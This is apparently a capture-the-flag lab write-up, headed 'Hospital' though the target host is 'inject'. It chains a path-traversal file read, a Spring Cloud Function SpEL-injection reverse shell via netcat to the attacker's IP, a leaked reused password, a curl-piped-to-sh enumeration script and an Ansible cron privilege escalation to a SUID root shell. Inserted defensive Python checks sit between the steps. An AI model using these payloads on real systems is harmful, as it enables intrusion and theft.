Hospital

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.228.213:22
Open 10.129.228.213:8080
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.228.213
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-24 19:58 UTC
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:58, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:58, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:58, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:58
Completed Parallel DNS resolution of 1 host. at 19:58, 0.11s elapsed
DNS resolution of 1 IPs took 0.11s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:58
Scanning 10.129.228.213 [2 ports]
Discovered open port 8080/tcp on 10.129.228.213
Discovered open port 22/tcp on 10.129.228.213
Completed Connect Scan at 19:58, 0.07s elapsed (2 total ports)
Initiating Service scan at 19:58
Scanning 2 services on 10.129.228.213
Completed Service scan at 19:58, 7.30s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.228.213.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:59, 2.51s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.33s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
Nmap scan report for 10.129.228.213
Host is up, received user-set (0.071s latency).
Scanned at 2024-11-24 19:58:52 UTC for 10s

PORT     STATE SERVICE     REASON  VERSION
22/tcp   open  ssh         syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ca:f1:0c:51:5a:59:62:77:f0:a8:0c:5c:7c:8d:da:f8 (RSA)
|   256 d5:1c:81:c9:7b:07:6b:1c:c1:b4:29:25:4b:52:21:9f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIUJSpBOORoHb6HHQkePUztvh85c2F5k5zMDp+hjFhD8VRC2uKJni1FLYkxVPc/yY3Km7Sg1GzTyoGUxvy+EIsg=
|   256 db:1d:8c:eb:94:72:b0:d3:ed:44:b9:6c:93:a7:f9:1d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICZzUvDL0INOklR7AH+iFw+uX+nkJtcw7V+1AsMO9P7p
8080/tcp open  nagios-nsca syn-ack Nagios NSCA
|_http-title: Home
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.80 seconds

HTTP (8080)

Writeup.png

Two users appear on /blog, admin and Brandon Auger, but none of the posts are readable.

Writeup-1.png

http://10.129.228.213:8080/upload accepts only images, so upload a valid one. You then get redirected to http://10.129.228.213:8080/show_image?img=kraken.png

LFI is possible through the img parameter of /show_image.

Writeup-2.png

Oddly enough, the vulnerable endpoint also returns directory listings, so you can browse the filesystem with it.

└─$ curl 'http://10.129.228.213:8080/show_image?img=../resources/application.properties'
server.tomcat.relaxed-query-chars=|,{,},[,]
server.error.whitelabel.enabled=false
spring.main.allow-circular-references=true
spring.servlet.multipart.max-file-size=1MB
spring.servlet.multipart.max-request-size=2MB
spring.cloud.config.uri=
spring.cloud.config.allow-override=true
debug=false
server.error.include-message=always
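As an added illustration (not code from the box or from this writeup), here is the check the show_image handler is missing, written in Python rather than the app's Java: the img parameter is normalised against the image root and refused if it escapes it or names a directory, using the traversal strings from above as inputs. The IMAGE_ROOT path is an assumption.

```python
import os
from pathlib import Path
from typing import Optional

# Assumed upload directory; the real WebApp's path is not given in the writeup.
IMAGE_ROOT = Path("/var/www/WebApp/images")

def resolve_image(img: str, root: Path = IMAGE_ROOT) -> Optional[Path]:
    """Return the file to serve for ?img=<img>, or None if the request must be refused.

    The box's show_image joins the parameter onto a directory and opens whatever
    results, which is why '../resources/application.properties' and the deep
    '../../../../../../../home/frank/...' strings both came back. The fix is to
    normalise the joined path and serve only paths that stay under the root.
    """
    # Empty names, NUL bytes and absolute paths are refused outright: a leading
    # '/' would make a naive join discard the root entirely.
    if not img or "\x00" in img or img.startswith(("/", "\\")):
        return None
    # Lexical normalisation collapses every '..' without touching the filesystem.
    candidate = Path(os.path.normpath(root / img))
    # Anything that climbed out of the root fails relative_to().
    try:
        candidate.relative_to(root)
    except ValueError:
        return None
    # The box also listed directories through this endpoint; serve regular files only.
    # (In production also resolve symlinks, e.g. candidate.resolve(), before this test.)
    if candidate.exists() and not candidate.is_file():
        return None
    return candidate
```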

We can also enumerate users, and the WebApp seems to be running as frank, since we have read access to files under /home/frank.

└─$ curl http://10.129.228.213:8080/show_image?img=../../../../../../../home/frank/.m2/settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

Password doesn't work on SSH.

└─$ curl http://10.129.228.213:8080/show_image?img=../../../../../../../var/www/WebApp/pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
        <modelVersion>4.0.0</modelVersion>
        <parent>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-starter-parent</artifactId>
                <version>2.6.5</version>
                <relativePath/> <!-- lookup parent from repository -->
        </parent>
        <groupId>com.example</groupId>
        <artifactId>WebApp</artifactId>
        <version>0.0.1-SNAPSHOT</version>
        <name>WebApp</name>
        <description>Demo project for Spring Boot</description>
        <properties>
                <java.version>11</java.version>
        </properties>
        <dependencies>
                <dependency>
                        <groupId>com.sun.activation</groupId>
                        <artifactId>javax.activation</artifactId>
                        <version>1.2.0</version>
                </dependency>

                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-thymeleaf</artifactId>
                </dependency>
                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-web</artifactId>
                </dependency>

                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-devtools</artifactId>
                        <scope>runtime</scope>
                        <optional>true</optional>
                </dependency>

                <dependency>
                        <groupId>org.springframework.cloud</groupId>
                        <artifactId>spring-cloud-function-web</artifactId>
                        <version>3.2.2</version>
                </dependency>
                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-test</artifactId>
                        <scope>test</scope>
                </dependency>
                <dependency>
                        <groupId>org.webjars</groupId>
                        <artifactId>bootstrap</artifactId>
                        <version>5.1.3</version>
                </dependency>
                <dependency>
                        <groupId>org.webjars</groupId>
                        <artifactId>webjars-locator-core</artifactId>
                </dependency>

        </dependencies>
        <build>
                <plugins>
                        <plugin>
                                <groupId>org.springframework.boot</groupId>
                                <artifactId>spring-boot-maven-plugin</artifactId>
                                <version>${parent.version}</version>
                        </plugin>
                </plugins>
                <finalName>spring-webapp</finalName>
        </build>
</project>

CVE-2022-22965 (Spring4Shell): the Docker PoC for CVE-2022-22965 against Spring Boot 2.6.5 doesn't work here.

CVE-2022-22963 (Spring Cloud Function SpEL injection through the routing-expression header): the PoC works, which matches the spring-cloud-function-web 3.2.2 dependency in the pom.
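An added example, not part of the writeup: a small pom.xml version check in Python that flags both CVEs from the recovered pom, using the first fixed releases from the Spring advisories (Spring Cloud Function 3.1.7/3.2.3 for CVE-2022-22963, Spring Boot 2.5.12/2.6.6 for the Framework fix for CVE-2022-22965). The pom excerpt is constructed from the output above.

```python
import xml.etree.ElementTree as ET

NS = {"m": "http://maven.apache.org/POM/4.0.0"}

# Constructed excerpt of the pom.xml read through the LFI; only the coordinates the
# check needs are kept (starter-web has no <version> because the parent manages it).
POM_XML = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <parent><groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-parent</artifactId><version>2.6.5</version></parent>
  <dependencies><dependency><groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-function-web</artifactId><version>3.2.2</version></dependency>
  <dependency><groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId></dependency></dependencies>
</project>"""

# First fixed release per maintained line, from the Spring advisories. Lines older
# than the ones listed were out of support at disclosure and count as affected.
ADVISORIES = {
    "CVE-2022-22963": ("org.springframework.cloud:spring-cloud-function-web",
                       {(3, 1): (3, 1, 7), (3, 2): (3, 2, 3)}),
    "CVE-2022-22965": ("org.springframework.boot:spring-boot-starter-parent",
                       {(2, 5): (2, 5, 12), (2, 6): (2, 6, 6)}),
}

def parse_version(text):
    # '2.6.5' -> (2, 6, 5); a qualifier such as '-SNAPSHOT' is dropped.
    return tuple(int(p) for p in text.split("-")[0].split(".")[:3])

def is_affected(version, fixed_by_line):
    # Affected when below the fix of its own line, or on an older unlisted line.
    line = version[:2]
    if line in fixed_by_line:
        return version < fixed_by_line[line]
    return version < min(fixed_by_line.values())

def declared_coordinates(pom_xml):
    # 'group:artifact' -> version tuple for the parent and every dependency that
    # declares a <version>; versions inherited from the parent BOM are not resolved.
    root = ET.fromstring(pom_xml)
    nodes = root.findall("m:parent", NS) + root.findall("m:dependencies/m:dependency", NS)
    found = {}
    for node in nodes:
        ver = node.findtext("m:version", default="", namespaces=NS)
        if ver:
            group = node.findtext("m:groupId", namespaces=NS)
            found[f"{group}:{node.findtext('m:artifactId', namespaces=NS)}"] = parse_version(ver)
    return found

def check_pom(pom_xml=POM_XML):
    # {cve: (declared version, affected)} for advisory coordinates present in the pom.
    coords = declared_coordinates(pom_xml)
    return {cve: (".".join(map(str, coords[c])), is_affected(coords[c], fixed))
            for cve, (c, fixed) in ADVISORIES.items() if c in coords}
```

Being in the affected range is not the same as being exploitable: the public CVE-2022-22965 exploit needs a WAR deployed on standalone Tomcat, which is consistent with that PoC failing here while the CVE-2022-22963 one succeeded.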

└─$ curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("busybox nc 10.10.14.42 4444 -e /bin/bash")' -d '' http://10.129.228.213:8080/functionRouter -s | jq .
Writeup-3.png
script /dev/null -qc /bin/bash
frank@inject:~$ id
uid=1000(frank) gid=1000(frank) groups=1000(frank)
frank@inject:~$ su - phil
su - phil
Password: DocPhillovestoInject123

phil@inject:~$ id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)

Password authentication didn't work over SSH but works locally, which suggests SSH has password authentication disabled.

SSH

Upgrade to SSH

└─$ ssh-keygen -f id_rsa -P x -q
└─$ cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMciiJD30Ulyy6yEipvjULwb/jORUPUJYA1PYqtNqT5x woyag@kraken
---
phil@inject:~/.ssh$ mkdir ~/.ssh; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMciiJD30Ulyy6yEipvjULwb/jORUPUJYA1PYqtNqT5x woyag@kraken' > ~/.ssh/authorized_keys

Still doesn't work, check SSH configuration:

phil@inject:~/.ssh$ grep -E '^DenyUsers|^DenyGroups' /etc/ssh/sshd_config
DenyUsers phil

Only the phil user is denied access, so we can SSH in as frank instead and then switch to phil.

User.txt

phil@inject:~$ cat user.txt
663a15ed16a9c6f45bcb6aa7c78fa3dc

Privilege Escalation

phil@inject:~$ curl 10.10.14.42/lp.sh|sh|tee /tmp/lp.log
				╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
...
root         916  0.0  0.0   6816  2928 ?        Ss   19:56   0:00 /usr/sbin/cron -f
root        8850  0.1  0.0   8356  3332 ?        S    21:06   0:00  _ /usr/sbin/CRON -f
root        8853  0.0  0.0   2608   596 ?        Ss   21:06   0:00      _ /bin/sh -c sleep 10 && /usr/bin/rm -rf /opt/automation/tasks/* && /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
root        8856  0.0  0.0   5476   516 ?        S    21:06   0:00          _ sleep 10
...
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/tmp/hsperfdata_frank/782
/tmp/lp.log
/opt/automation/tasks/playbook_1.yml
/var/log/syslog
...

phil@inject:/opt/automation/tasks$ cat /opt/automation/tasks/playbook_1.yml
- hosts: localhost
  tasks:
  - name: Checking webapp service
    ansible.builtin.systemd:
      name: webapp
      enabled: yes
      state: started

There's a root cron job that appears to run the Ansible playbooks in /opt/automation/tasks and then removes them: the process list above shows it wiping the directory and copying playbook_1.yml back in on every run.
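An added defensive check, not from the writeup: a Python audit of a directory that a root job executes playbooks from, flagging group/other-writable entries (the condition that lets a member of the staff group drop a playbook here), non-root ownership and symlinks. The demo rebuilds the layout in a temporary directory, a constructed stand-in for /opt/automation/tasks.

```python
import os
import stat
import tempfile
from pathlib import Path

def audit_task_dir(task_dir):
    """Findings for a directory whose contents a root job executes.

    A root cron that runs every playbook it finds under a directory turns write
    access to that directory into root: here /opt/automation/tasks was writable
    by the staff group phil belongs to. Safe state: every entry owned by uid 0,
    no group/other write bit, and no symlinks pointing elsewhere.
    """
    findings = []
    top = Path(task_dir)
    for path in [top, *top.rglob("*")]:
        st = path.lstat()
        if st.st_uid != 0:
            findings.append((str(path), "not owned by root"))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((str(path), "writable by group or others"))
        if stat.S_ISLNK(st.st_mode):
            findings.append((str(path), "symlink inside executed directory"))
    return findings

def demo():
    """Constructed replica of the vulnerable layout in a temp directory. Ownership
    can't be changed without root, so only the mode-bit findings are counted."""
    with tempfile.TemporaryDirectory() as tmp:
        tasks = Path(tmp, "tasks")
        tasks.mkdir()
        os.chmod(tasks, 0o775)              # group-writable, as on the box
        playbook = tasks / "playbook_1.yml"
        playbook.write_text("- hosts: localhost\n  tasks: []\n")
        os.chmod(playbook, 0o664)

        def writable_findings():
            return [f for f in audit_task_dir(tasks) if f[1].startswith("writable")]

        before = len(writable_findings())
        os.chmod(tasks, 0o755)              # remediation: only the owner may write
        os.chmod(playbook, 0o644)
        after = len(writable_findings())
        return before, after
```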

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/

phil@inject:/opt/automation/tasks$ nano letmein.yml
phil@inject:/opt/automation/tasks$ cat letmein.yml
- hosts: localhost
  tasks:
    - name: RShell
      command: install -m4777 /bin/bash /tmp/rootbash

After about 10 seconds the cron job has run the playbook as root:

phil@inject:/opt/automation/tasks$ /tmp/rootbash -p
rootbash-5.0# id
uid=1001(phil) gid=1001(phil) euid=0(root) groups=1001(phil),50(staff)

Root.txt

rootbash-5.0# cd /root
rootbash-5.0# cat root.txt
67f5ef862b1bfe0af73e7dbc60475e72
